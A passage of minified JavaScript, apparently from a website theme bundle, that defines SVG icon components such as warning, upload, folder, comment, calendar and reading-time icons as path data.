2.05 0 0 1 24 35.161"}))),warning_triangle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 43.19"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M23.999 27.248a2.05 2.05 0 0 1-2.05-2.05V14.907a2.05 2.05 0 0 1 4.1 0v10.291a2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M23.999 34.621a2.05 2.05 0 1 1 2.05-2.05 2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M23.999 4.1a1.975 1.975 0 0 1 1.739 1l17.887 30.978a2.009 2.009 0 0 1-1.739 3.013H6.116a2.009 2.009 0 0 1-1.739-3.013L22.26 5.104a1.975 1.975 0 0 1 1.739-1m0-4.1a6.051 6.051 0 0 0-5.29 3.055L.825 34.029a6.107 6.107 0 0 0 5.289 9.161H41.88a6.108 6.108 0 0 0 5.29-9.161L29.287 3.055A6.05 6.05 0 0 0 23.997 0"}))),upload_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 41.6"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.777 0a17.253 17.253 0 0 0-15.97 10.731 12.026 12.026 0 1 0-5.2 23.48 2.09 2.09 0 0 0 .413.042 2.051 2.051 0 0 0 .409-4.06 7.924 7.924 0 0 1 1.6-15.685 7.85 7.85 0 0 1 3.23.689l2.2.988.618-2.333a13.132 13.132 0 0 1 25.821 3.372 13 13 0 0 1-4.17 9.6 2.052 2.052 0 0 0 2.8 3A17.227 17.227 0 0 0 30.778.003"}),(0,o.createElement)("path",{d:"M26.761 14.824a1.164 1.164 0 0 0-1.775 0l-8.314 9.8a1.164 1.164 0 0 0 .888 1.917h5.179v13.888a1.164 1.164 0 0 0 1.164 1.164h3.941a1.164 1.164 0 0 0 1.164-1.164V26.546h5.179a1.164 1.164 0 0 0 .888-1.917Z"}))),cat1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 41.903 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M41.904.999v17.31l-.453.813-1.846 1.143a3.248 3.248 0 0 0-1.546 2.766v17.817a1 1 0 0 1-1 1h-1.6a2.141 2.141 0 0 0-.366.021V11.046a3.265 3.265 0 0 0-3.255-3.255H3.888A3.883 3.883 0 0 1 1.142 1.16 3.8 3.8 0 0 1 3.888 0h37.02a1 1 0 0 1 .996.999Z"}),(0,o.createElement)("path",{d:"M31.222 10.68H3.885A6.73 6.73 0 0 1 0 9.459v36.656A3.885 3.885 0 0 0 3.885 50h27.337a.978.978 0 0 0 .979-.978V11.658a.978.978 0 0 0-.979-.978Zm-12.243 34.5H6.916a1.444 1.444 0 0 1 0-2.888h12.063a1.444 1.444 0 0 1 0 2.888Zm0-6.55H6.916a1.444 1.444 0 1 1 0-2.888h12.063a1.444 1.444 0 0 1 0 2.888Z"}))),cat2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42.76 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M39.837 0H6.08A6.081 6.081 0 0 0 .001 6.081v37.841A6.085 6.085 0 0 0 6.08 50h25.051a2.927 2.927 0 0 0 2.923-2.923v-4.068a.331.331 0 0 1 .33-.331h2.006a2.926 2.926 0 0 0 2.923-2.923V23.23a.33.33 0 0 1 .155-.281l1.919-1.2a2.908 2.908 0 0 0 1.374-2.479V2.923A2.927 2.927 0 0 0 39.837 0Zm-8.376 47.077a.331.331 0 0 1-.331.331H6.08a3.49 3.49 0 0 1-3.487-3.486V11.06a6.048 6.048 0 0 0 3.487 1.1h25.051a.331.331 0 0 1 .331.331Zm8.707-27.8a.331.331 0 0 1-.156.281l-1.918 1.2a2.906 2.906 0 0 0-1.374 2.479v16.522a.331.331 0 0 1-.331.331h-2.006a2.76 2.76 0 0 0-.33.019V12.493A2.927 2.927 0 0 0 31.13 9.57H6.08a3.489 3.489 0 0 1 0-6.978h33.757a.332.332 0 0 1 .331.331Z"}),(0,o.createElement)("path",{d:"M19.602 34.623h-10.8a1.3 1.3 0 1 0 0 2.592h10.8a1.3 1.3 0 0 0 0-2.592ZM19.602 40.484h-10.8a1.3 1.3 0 0 0 0 2.592h10.8a1.3 1.3 0 0 0 0-2.592Z"}))),cat3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 42.669"},(0,o.createElement)("path",{d:"M43.86 42.669H6.141a6.146 6.146 0 0 1-6.139-6.14V13.972a6.146 6.146 0 0 1 6.139-6.139h16.146a2.578 2.578 0 0 0 1.559-.529l7.778-5.95a6.607 6.607 0 0 1 4-1.354h8.243a6.146 6.146 0 0 1 6.14 6.139v30.39a6.146 6.146 0 0 1-6.147 6.14ZM6.141 11.843a2.134 2.134 0 0 0-2.13 2.131v22.557a2.133 2.133 0 0 0 2.13 2.131h37.721a2.133 2.133 0 0 0 2.131-2.131V6.143a2.133 2.133 0 0 0-2.131-2.13h-8.243a2.583 2.583 0 0 0-1.559.528l-7.777 5.95a6.606 6.606 0 0 1-3.995 1.353Z"})),cat4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.999 43.039"},(0,o.createElement)("g",null,(0,o.createElement)("g",null,(0,o.createElement)("g",{transform:"translate(-504.441 -266.472)"},(0,o.createElement)("rect",{width:"41.146",height:"29.051",rx:"1.176",transform:"translate(513.295 280.459)"})),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M3.029 43.039H0V4.828A4.831 4.831 0 0 1 4.825.002h9.652a4.85 4.85 0 0 1 2.975 1.026l5.381 4.214a1.8 1.8 0 0 0 1.107.382h15.607v3.03H23.94a4.845 4.845 0 0 1-2.975-1.027l-5.381-4.213a1.805 1.805 0 0 0-1.107-.382H4.825a1.8 1.8 0 0 0-1.8 1.8Z"}))))),cat5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 41.557"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M28.107 12.77a5.549 5.549 0 0 0 3.7-1.4l5.451-4.809a3.206 3.206 0 0 1 2.124-.8h5.036v-3.9A1.853 1.853 0 0 0 42.561.005h-10.1a1.888 1.888 0 0 0-1.229.454l-5.45 4.821a6.926 6.926 0 0 1-4.6 1.737H1.852a1.864 1.864 0 0 0-1.857 1.87V33.93a1.865 1.865 0 0 0 1.857 1.87h3.714V15.98a3.216 3.216 0 0 1 3.206-3.206Z"}),(0,o.createElement)("path",{d:"M48.876 8.429h-9.26l-.753.285-5.279 4.657a8.291 8.291 0 0 1-5.477 2.071H9.382a1.142 1.142 0 0 0-1.139 1.139v23.837a1.142 1.142 0 0 0 1.139 1.139h39.48a1.142 1.142 0 0 0 1.139-1.139V9.554a1.125 1.125 0 0 0-1.125-1.125Z"}))),cat6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50.001 40.271"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M49.354 15.089a4.21 4.21 0 0 0-3.416-1.5h-1.842v-1.774a4.741 4.741 0 0 0-4.734-4.738h-18.2a2.348 2.348 0 0 1-2.348-2.343A4.741 4.741 0 0 0 14.08-.004H4.735A4.744 4.744 0 0 0-.004 4.734v30.8a4.725 4.725 0 0 0 1.544 3.492 4.178 4.178 0 0 0 2.745 1.222c.041 0 .077.005.107.006h.092c.083 0 .164.011.249.011H39.36c2.5 0 4.894-1.614 5.452-3.676l5.065-18.7a3.157 3.157 0 0 0-.523-2.8ZM4.739 2.389h9.341a2.349 2.349 0 0 1 2.344 2.348 4.741 4.741 0 0 0 4.738 4.734h18.2a2.347 2.347 0 0 1 2.343 2.347v1.774h-30.39c-2.5 0-4.894 1.615-5.452 3.676L2.391 30.085V4.738A2.35 2.35 0 0 1 4.739 2.39ZM47.57 17.268l-5.065 18.7a3.326 3.326 0 0 1-3.068 1.908h-34.7a1.783 1.783 0 0 1-.179-.009l-.078-.006a2.319 2.319 0 0 1-1.266-.549.786.786 0 0 1-.111-.72l5.065-18.7a3.343 3.343 0 0 1 3.145-1.91h34.623a1.908 1.908 0 0 1 1.517.558.789.789 0 0 1 .117.729Z"}),(0,o.createElement)("path",{d:"M36.805 25.737H14.26a.513.513 0 0 0-.495.377l-.375 1.364a.514.514 0 0 0 .495.65h22.546a.515.515 0 0 0 .495-.378l.374-1.364a.513.513 0 0 0-.495-.649Z"}))),cat7:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 40.902 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M39.721 9.573a3.6 3.6 0 0 1-.934-7.073 1.228 1.228 0 0 0 .934-1.177v-.11A1.208 1.208 0 0 0 38.513.004H5.974A5.968 5.968 0 0 0 .001 5.949v36.814a7.249 7.249 0 0 0 7.241 7.241h31.939a1.724 1.724 0 0 0 1.722-1.721V10.756a1.187 1.187 0 0 0-1.182-1.183ZM3.431 3.432a3.588 3.588 0 0 1 2.548-1.054h28.976a5.969 5.969 0 0 0 0 7.195H5.975a3.6 3.6 0 0 1-2.548-6.141Zm3.816 44.2a4.873 4.873 0 0 1-4.867-4.868V10.653a6.167 6.167 0 0 0 3.75 1.29h32.4v6.609H23.644a1.2 1.2 0 0 0-1.2 1.2v7.541a1.2 1.2 0 0 0 1.2 1.2h14.885v19.142Z"}),(0,o.createElement)("path",{d:"M31.201 35.2H9.283a1.187 1.187 0 0 0 0 2.374h21.918a1.187 1.187 0 1 0 0-2.374ZM31.201 41.362H9.283a1.187 1.187 0 0 0 0 2.374h21.918a1.187 1.187 0 0 0 0-2.374Z"}))),commentCount1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 77.5 56"},(0,o.createElement)("path",{d:"M51.2 0H26.3C11.8 0 0 11.8 0 26.3V56h51.2c14.5 0 26.3-11.8 26.3-26.3v-3.4C77.5 11.8 65.7 0 51.2 0zm21.9 29.7c0 12.1-9.8 21.9-21.9 21.9H4.4V26.3c0-12.1 9.8-21.9 21.9-21.9h24.9c12.1 0 21.9 9.8 21.9 21.9v3.4z"}),(0,o.createElement)("path",{d:"M58.1 15.2H19.4c-1.2 0-2.2 1-2.2 2.2 0 1.2 1 2.2 2.2 2.2H58c1.2 0 2.2-1 2.2-2.2.1-1.2-.9-2.2-2.1-2.2zM58.1 25.8H19.4c-1.2 0-2.2 1-2.2 2.2 0 1.2 1 2.2 2.2 2.2H58c1.2 0 2.2-1 2.2-2.2.1-1.2-.9-2.2-2.1-2.2zM58.1 36.4H19.4c-1.2 0-2.2 1-2.2 2.2s1 2.2 2.2 2.2H58c1.2 0 2.2-1 2.2-2.2s-.9-2.2-2.1-2.2z"})),commentCount2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 77.5 54.7"},(0,o.createElement)("path",{d:"M50.1 0H27.3C12.2 0 0 12.3 0 27.4v27.3h50.1c7.6 0 14.4-3.1 19.3-8 5-4.9 8-11.8 8-19.3C77.5 12.3 65.2 0 50.1 0zM16.4 33.8c-3.6 0-6.5-2.9-6.5-6.5s2.9-6.5 6.5-6.5 6.5 2.9 6.5 6.5-2.9 6.5-6.5 6.5zm21.7 0c-3.6 0-6.5-2.9-6.5-6.5s2.9-6.5 6.5-6.5 6.5 2.9 6.5 6.5-2.9 6.5-6.5 6.5zm21.8 0c-3.6 0-6.5-2.9-6.5-6.5s2.9-6.5 6.5-6.5 6.5 2.9 6.5 6.5-3 6.5-6.5 6.5z"})),commentCount3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 61.9 54.7"},(0,o.createElement)("path",{d:"M49.8 0H12.1C5.4 0 0 5.4 0 12.1v19.7c0 6.6 5.4 12.1 12.1 12.1h5.8v8.7c0 .9.5 1.7 1.3 2.1.3.2.7.2 1 .2.5 0 1-.2 1.4-.5L34.8 44h15.1C56.5 44 62 38.6 62 31.9V12.1C61.9 5.4 56.4 0 49.8 0zm8 31.7c0 4.4-3.6 8-8 8H33.3l-11.3 9v-9h-9.9c-4.4 0-8-3.6-8-8V12.1c0-4.4 3.6-8 8-8h37.7c4.4 0 8 3.6 8 8v19.6z"}),(0,o.createElement)("circle",{cx:"17.2",cy:"21.9",r:"4"}),(0,o.createElement)("circle",{cx:"30.9",cy:"21.9",r:"4"}),(0,o.createElement)("circle",{cx:"44.6",cy:"21.9",r:"4"})),commentCount4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 61.9 50.1"},(0,o.createElement)("path",{d:"M61.9 15.6C61.9 7 54.8 0 46.2 0H27.5c-8.6 0-15.6 7-15.6 15.6v4.2C5.3 20.3 0 25.8 0 32.5v17.6h27.4c7 0 12.6-5.6 12.7-12.6h21.7V15.6zM27.4 47.4H2.7V32.5c0-5.2 4.1-9.5 9.2-9.9.4 8.3 7.2 15 15.6 15h9.8c0 5.4-4.4 9.8-9.9 9.8zm31.7-12.6H27.5c-7.1 0-12.9-5.8-12.9-12.9v-6.3c0-7.1 5.8-12.9 12.9-12.9h18.7c7.1 0 12.9 5.8 12.9 12.9v19.2z"}),(0,o.createElement)("path",{d:"M42.9 24.5H24.6c-.8 0-1.4.6-1.4 1.4 0 .8.6 1.4 1.4 1.4h18.3c.8 0 1.4-.6 1.4-1.4 0-.8-.6-1.4-1.4-1.4zM49.2 17.4H24.6c-.8 0-1.4.6-1.4 1.4 0 .8.6 1.4 1.4 1.4h24.6c.8 0 1.4-.6 1.4-1.4-.1-.8-.7-1.4-1.4-1.4zM49.2 10.3H24.6c-.8 0-1.4.6-1.4 1.4 0 .8.6 1.4 1.4 1.4h24.6c.8 0 1.4-.6 1.4-1.4-.1-.8-.7-1.4-1.4-1.4z"})),commentCount5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 50.2"},(0,o.createElement)("path",{d:"M24.6 0C11 0 0 9.8 0 21.9c0 6.6 3.2 12.7 8.8 16.8v11.5l12-6.7c1.3.2 2.5.3 3.8.3 13.6 0 24.6-9.8 24.6-21.9S38.2 0 24.6 0zm0 40.5c-1.3 0-2.6-.1-3.8-.3l-.6-.2-8 4.4V37l-.7-.5C6.3 33 3.4 27.7 3.4 21.9c0-10.2 9.5-18.5 21.2-18.5s21.2 8.3 21.2 18.5-9.5 18.6-21.2 18.6z"}),(0,o.createElement)("path",{d:"M33.8 15.9H15.4c-.9 0-1.7.8-1.7 1.7s.8 1.7 1.7 1.7h18.5c.9 0 1.7-.8 1.7-1.7s-.8-1.7-1.8-1.7zM29.6 24.5h-10c-.9 0-1.7.8-1.7 1.7s.8 1.7 1.7 1.7h10.1c.9 0 1.7-.8 1.7-1.7s-.8-1.7-1.8-1.7z"})),commentCount6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 38"},(0,o.createElement)("path",{d:"M30.7 0C24 0 17.9 3.2 14.6 8.3h-.5C6.3 8.2 0 13.9 0 20.8c0 3.7 1.8 7.2 4.9 9.5v6.9l7.2-4c.7.1 1.4.1 2 .1 2.9 0 5.7-.8 8-2.2 2.6 1.2 5.6 1.9 8.6 1.9 1 0 1.9-.1 2.8-.2l9.1 5.1v-8.8c4.2-3.1 6.6-7.7 6.6-12.7 0-9-8.3-16.4-18.5-16.4zM12 30.4l-.5-.1-3.8 2.1v-3.6l-.6-.4c-2.7-1.9-4.3-4.6-4.3-7.6 0-5.1 4.5-9.3 10.3-9.7-.7 1.7-1 3.5-1 5.4 0 5.1 2.7 9.9 7.1 13-2.2 1-4.5 1.3-7.2.9zm28.4-3.1-.6.4v5.4L34 29.9l-.5.1c-.9.2-1.8.2-2.8.2-2.8 0-5.6-.7-8.1-1.9-4.8-2.5-7.7-6.9-7.7-11.8 0-2.1.6-4.2 1.6-6.1 2.7-4.7 8.1-7.6 14.1-7.6 8.7 0 15.7 6.1 15.7 13.7.1 4.3-2.1 8.2-5.9 10.8z"})),comment:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 19 19"},(0,o.createElement)("path",{d:"M9.43016863,13.2235931 C9.58624731,13.094699 9.7823475,13.0241935 9.98476849,13.0241935 L15.0564516,13.0241935 C15.8581553,13.0241935 16.5080645,12.3742843 16.5080645,11.5725806 L16.5080645,3.44354839 C16.5080645,2.64184472 15.8581553,1.99193548 15.0564516,1.99193548 L3.44354839,1.99193548 C2.64184472,1.99193548 1.99193548,2.64184472 1.99193548,3.44354839 L1.99193548,11.5725806 C1.99193548,12.3742843 2.64184472,13.0241935 3.44354839,13.0241935 L5.76612903,13.0241935 C6.24715123,13.0241935 6.63709677,13.4141391 6.63709677,13.8951613 L6.63709677,15.5301903 L9.43016863,13.2235931 Z M3.44354839,14.766129 C1.67980032,14.766129 0.25,13.3363287 0.25,11.5725806 L0.25,3.44354839 C0.25,1.67980032 1.67980032,0.25 3.44354839,0.25 L15.0564516,0.25 C16.8201997,0.25 18.25,1.67980032 18.25,3.44354839 L18.25,11.5725806 C18.25,13.3363287 16.8201997,14.766129 15.0564516,14.766129 L10.2979143,14.766129 L6.32072889,18.0506004 C5.75274472,18.5196577 4.89516129,18.1156602 4.89516129,17.3790323 L4.89516129,14.766129 L3.44354839,14.766129 Z"})),date1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 94.9 88.7"},(0,o.createElement)("path",{d:"M84.5 7.9H71.8V3.2c0-1.8-1.5-3.2-3.2-3.2s-3.2 1.5-3.2 3.2v4.7H50.7V3.2c0-1.8-1.5-3.2-3.2-3.2-1.8 0-3.2 1.5-3.2 3.2v4.7H29.6V3.2c0-1.8-1.5-3.2-3.2-3.2s-3.2 1.5-3.2 3.2v4.7H10.4C4.7 7.9 0 12.6 0 18.3v60C0 84 4.7 88.7 10.4 88.7h74.1c5.7 0 10.4-4.7 10.4-10.4v-60c0-5.7-4.7-10.4-10.4-10.4zm3.9 70.4c0 2.1-1.7 3.9-3.9 3.9H10.4c-2.1 0-3.9-1.7-3.9-3.9v-60c0-2.1 1.7-3.9 3.9-3.9h12.8V20c0 1.8 1.5 3.2 3.2 3.2s3.2-1.5 3.2-3.2v-5.6h14.6V20c0 1.8 1.5 3.2 3.2 3.2 1.8 0 3.2-1.5 3.2-3.2v-5.6h14.6V20c0 1.8 1.5 3.2 3.2 3.2s3.2-1.5 3.2-3.2v-5.6h12.8c2.1 0 3.9 1.7 3.9 3.9v60z"}),(0,o.createElement)("circle",{cx:"26.4",cy:"36.8",r:"3.6"}),(0,o.createElement)("path",{d:"M47.4 33.2c-2 0-3.6 1.6-3.6 3.6s1.6 3.6 3.6 3.6 3.6-1.6 3.6-3.6-1.6-3.6-3.6-3.6z"}),(0,o.createElement)("circle",{cx:"68.5",cy:"36.8",r:"3.6"}),(0,o.createElement)("circle",{cx:"26.4",cy:"51.9",r:"3.6"}),(0,o.createElement)("path",{d:"M47.4 48.3c-2 0-3.6 1.6-3.6 3.6s1.6 3.6 3.6 3.6 3.6-1.6 3.6-3.6-1.6-3.6-3.6-3.6z"}),(0,o.createElement)("circle",{cx:"68.5",cy:"51.9",r:"3.6"}),(0,o.createElement)("circle",{cx:"26.4",cy:"67",r:"3.6"}),(0,o.createElement)("path",{d:"M47.4 63.4c-2 0-3.6 1.6-3.6 3.6s1.6 3.6 3.6 3.6S51 69 51 67s-1.6-3.6-3.6-3.6z"}),(0,o.createElement)("circle",{cx:"68.5",cy:"67",r:"3.6"})),date2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 94.9 89.8"},(0,o.createElement)("path",{d:"M85.2 8.9H73.6V3.2c0-1.8-1.4-3.2-3.2-3.2-1.8 0-3.2 1.4-3.2 3.2v5.7H27.7V3.2c0-1.8-1.4-3.2-3.2-3.2s-3.2 1.4-3.2 3.2v5.7H9.7C4.3 8.9 0 13.3 0 18.6V80c0 5.4 4.3 9.7 9.7 9.7h75.5c5.4 0 9.7-4.4 9.7-9.7V18.6c0-5.3-4.4-9.7-9.7-9.7zm0 74.5H9.7c-1.8 0-3.3-1.5-3.3-3.3V30.4h82.1V80c0 1.9-1.5 3.4-3.3 3.4z"}),(0,o.createElement)("path",{d:"M16 40.4h8.5v8.5H16zM43.2 40.4h8.5v8.5h-8.5zM70.4 40.4h8.5v8.5h-8.5zM16 65.1h8.5v8.5H16zM43.2 65.1h8.5v8.5h-8.5zM70.4 65.1h8.5v8.5h-8.5z"})),date3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 92.8 84"},(0,o.createElement)("path",{d:"M87.2 6.7h-5.9V2.4c0-1.3-1.1-2.4-2.4-2.4-1.3 0-2.4 1.1-2.4 2.4v4.3H64.1V2.4C64.1 1.1 63 0 61.6 0s-2.4 1.1-2.4 2.4v4.3H46.8V2.4c0-1.3-1.1-2.4-2.4-2.4S42 1.1 42 2.4v4.3h-6c-2.7 0-5.3 1.5-6.7 3.9l-28 48.9C-.2 62.2-.4 64.8.9 67c1.3 2.3 4.1 3.6 7.7 3.6h21.9v1.5c0 2.5.8 4.9 2.2 6.9 2.2 3.1 5.8 5 9.7 5H81c6.5 0 11.8-5.3 11.8-11.8V12.3c0-3-2.5-5.6-5.6-5.6zM5.1 64.6c-.4-.6-.2-1.5.4-2.6l28-48.9c.5-.9 1.4-1.4 2.4-1.4h49c.3 0 .5.2.6.3.1.2.2.4 0 .7L58.7 59.6c-1.9 3.4-7.2 6.2-11.6 6.2H8.5c-1.7 0-3-.5-3.4-1.2zM81 79.1H42.3c-2.3 0-4.4-1.1-5.7-2.9-.8-1.2-1.3-2.6-1.3-4v-1.5h11.8c6.1 0 13-3.8 15.8-8.7l25-43.6v53.8c0 3.8-3.1 6.9-6.9 6.9z"}),(0,o.createElement)("path",{d:"M41.8 23.8h-6.7l-3 5.3h6.7zM56.6 23.8H50l-3.1 5.3h6.7zM71.4 23.8h-6.6l-3 5.3h6.6zM28.1 36.1l-3 5.3h6.6l3-5.3zM46.5 41.4l3.1-5.3h-6.7l-3 5.3zM61.4 41.4l3-5.3h-6.7l-3 5.3zM18 53.7h6.7l3-5.3H21zM42.5 48.4h-6.6l-3.1 5.3h6.7zM47.7 53.7h6.6l3.1-5.3h-6.7z"})),date4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 84.8 84"},(0,o.createElement)("path",{d:"M74.7 12.2h-9V4.4c0-2.4-2-4.4-4.4-4.4-2.4 0-4.4 2-4.4 4.4v7.8h-29V4.4c0-2.4-2-4.4-4.4-4.4C21 0 19 2 19 4.4v7.8h-9c-5.5 0-10 4.5-10 10.1v7.2h84.8v-7.2c0-5.6-4.5-10.1-10.1-10.1zM0 74c0 5.5 4.5 10 10.1 10h64.7c5.6 0 10-4.5 10-10.1V38.4H0V74z"})),date5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 84.8 79.3"},(0,o.createElement)("path",{d:"M75.6 7.1H64.1V2.9c0-1.6-1.3-2.9-2.9-2.9-1.6 0-2.9 1.3-2.9 2.9v4.2H26.4V2.9c0-1.6-1.3-2.9-2.9-2.9s-2.9 1.3-2.9 2.9v4.2H9.2C4.1 7.1 0 11.2 0 16.2v53.9c0 5.1 4.1 9.2 9.2 9.2h66.4c5.1 0 9.2-4.1 9.2-9.2V16.2c0-5-4.1-9.1-9.2-9.1zM9.2 12.8h11.5v5c0 1.6 1.3 2.9 2.9 2.9s2.9-1.3 2.9-2.9v-5h31.9v5c0 1.6 1.3 2.9 2.9 2.9 1.6 0 2.9-1.3 2.9-2.9v-5h11.5c1.9 0 3.4 1.5 3.4 3.4v9.5H5.7v-9.5c0-1.8 1.6-3.4 3.5-3.4zm66.4 60.7H9.2c-1.9 0-3.4-1.5-3.4-3.4V31.5h73.3v38.6c0 1.9-1.6 3.4-3.5 3.4z"})),calendar:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18 19"},(0,o.createElement)("path",{d:"M4.60069444,4.09375 L3.25,4.09375 C2.47334957,4.09375 1.84375,4.72334957 1.84375,5.5 L1.84375,7.26736111 L16.15625,7.26736111 L16.15625,5.5 C16.15625,4.72334957 15.5266504,4.09375 14.75,4.09375 L13.3993056,4.09375 L13.3993056,4.55555556 C13.3993056,5.02154581 13.0215458,5.39930556 12.5555556,5.39930556 C12.0895653,5.39930556 11.7118056,5.02154581 11.7118056,4.55555556 L11.7118056,4.09375 L6.28819444,4.09375 L6.28819444,4.55555556 C6.28819444,5.02154581 5.9104347,5.39930556 5.44444444,5.39930556 C4.97845419,5.39930556 4.60069444,5.02154581 4.60069444,4.55555556 L4.60069444,4.09375 Z M6.28819444,2.40625 L11.7118056,2.40625 L11.7118056,1 C11.7118056,0.534009742 12.0895653,0.15625 12.5555556,0.15625 C13.0215458,0.15625 13.3993056,0.534009742 13.3993056,1 L13.3993056,2.40625 L14.75,2.40625 C16.4586309,2.40625 17.84375,3.79136906 17.84375,5.5 L17.84375,15.875 C17.84375,17.5836309 16.4586309,18.96875 14.75,18.96875 L3.25,18.96875 C1.54136906,18.96875 0.15625,17.5836309 0.15625,15.875 L0.15625,5.5 C0.15625,3.79136906 1.54136906,2.40625 3.25,2.40625 L4.60069444,2.40625 L4.60069444,1 C4.60069444,0.534009742 4.97845419,0.15625 5.44444444,0.15625 C5.9104347,0.15625 6.28819444,0.534009742 6.28819444,1 L6.28819444,2.40625 Z M1.84375,8.95486111 L1.84375,15.875 C1.84375,16.6516504 2.47334957,17.28125 3.25,17.28125 L14.75,17.28125 C15.5266504,17.28125 16.15625,16.6516504 16.15625,15.875 L16.15625,8.95486111 L1.84375,8.95486111 Z"})),readingTime1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 33.7 33.6"},(0,o.createElement)("path",{d:"M4.8 22.3h12.1v2H4.8zM4.8 27.2h9.7v2H4.8z"}),(0,o.createElement)("path",{d:"M33.7 11.3C33.7 5.1 28.6 0 22.4 0c-6.2 0-11.3 5.1-11.3 11.3 0 1.2.2 2.4.6 3.6H9.4C4.2 14.9 0 19 0 24.2v9.4h17.9c2.5 0 4.8-1 6.6-2.7 1.8-1.8 2.7-4.1 2.7-6.6 0-.9-.1-1.7-.4-2.6 4.1-1.8 6.9-5.8 6.9-10.4zm-8.4 12.9c0 2-.8 3.8-2.2 5.2-1.4 1.4-3.2 2.2-5.2 2.2H2v-7.4c0-4.1 3.3-7.4 7.4-7.4h3.2c1.9 3.4 5.6 5.7 9.8 5.7.9 0 1.8-.1 2.6-.3.2.7.3 1.3.3 2zm-2.9-3.6c-5.1 0-9.3-4.2-9.3-9.3S17.3 2 22.4 2s9.3 4.2 9.3 9.3-4.2 9.3-9.3 9.3z"}),(0,o.createElement)("path",{d:"M23.4 5.8h-2v5.9l3.9 3.9 1.4-1.4-3.3-3.3z"})),readingTime2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 33.7 33.7"},(0,o.createElement)("path",{d:"M16.8 0C7.6 0 0 7.6 0 16.8c0 9.3 7.6 16.8 16.8 16.8 9.3 0 16.8-7.6 16.8-16.8C33.7 7.6 26.1 0 16.8 0zM18 31.4v-2.3h-2.2v2.3C8.6 30.8 2.9 25.1 2.3 18h2.3v-2.2H2.3C2.9 8.6 8.6 2.9 15.7 2.3v2.3H18V2.3c7.2.5 12.9 6.3 13.4 13.4h-2.3V18h2.3c-.6 7.1-6.3 12.8-13.4 13.4z"}),(0,o.createElement)("path",{d:"M18 7.7h-2.3v9.6l6 6 1.6-1.6-5.3-5.3z"})),readingTime3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.5 31.3"},(0,o.createElement)("path",{d:"M22 17.9c-.4 0-.8.3-.8.8v4.9H5.3V7.2h4.5c.4 0 .8-.3.8-.8s-.3-.8-.8-.8h-6C1.7 5.7 0 7.4 0 9.6v17.9c0 1 .4 2 1.1 2.7.7.7 1.7 1.1 2.7 1.1H22c.4 0 .8-.3.8-.8s-.3-.8-.8-.8H3.8c-.6 0-1.2-.2-1.7-.7-.4-.4-.7-1-.7-1.7 0-.6.2-1.2.7-1.7.4-.4 1-.7 1.7-.7h18.8v-6.4c.1-.2-.2-.6-.6-.6zM1.5 24.4V9.6c0-1.3 1-2.3 2.3-2.3v16.4c-.8-.1-1.6.2-2.3.7z"}),(0,o.createElement)("path",{d:"M3.6 26.7c-.4 0-.8.3-.8.8s.3.8.8.8H22c.4 0 .8-.3.8-.8s-.3-.8-.8-.8H3.6zM19.9 0c-4.8 0-8.7 3.9-8.7 8.7s3.9 8.7 8.7 8.7 8.7-3.9 8.7-8.7-4-8.7-8.7-8.7zm0 15.9c-4 0-7.2-3.2-7.2-7.2s3.2-7.2 7.2-7.2S27 4.7 27 8.7s-3.2 7.2-7.1 7.2z"}),(0,o.createElement)("path",{d:"M20.6 8.4V3.8c0-.4-.3-.8-.8-.8s-.8.3-.8.8V9l3.6 3.6c.1.1.3.2.5.2s.4-.1.5-.2c.3-.3.3-.8 0-1.1l-3-3.1z"})),readingTime4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 30 30"},(0,o.createElement)("path",{d:"M15 0C6.7 0 0 6.7 0 15s6.7 15 15 15 15-6.7 15-15S23.3 0 15 0zm0 27.5C8.1 27.5 2.5 21.9 2.5 15S8.1 2.5 15 2.5 27.5 8.1 27.5 15 21.9 27.5 15 27.5z"}),(0,o.createElement)("path",{d:"M16.2 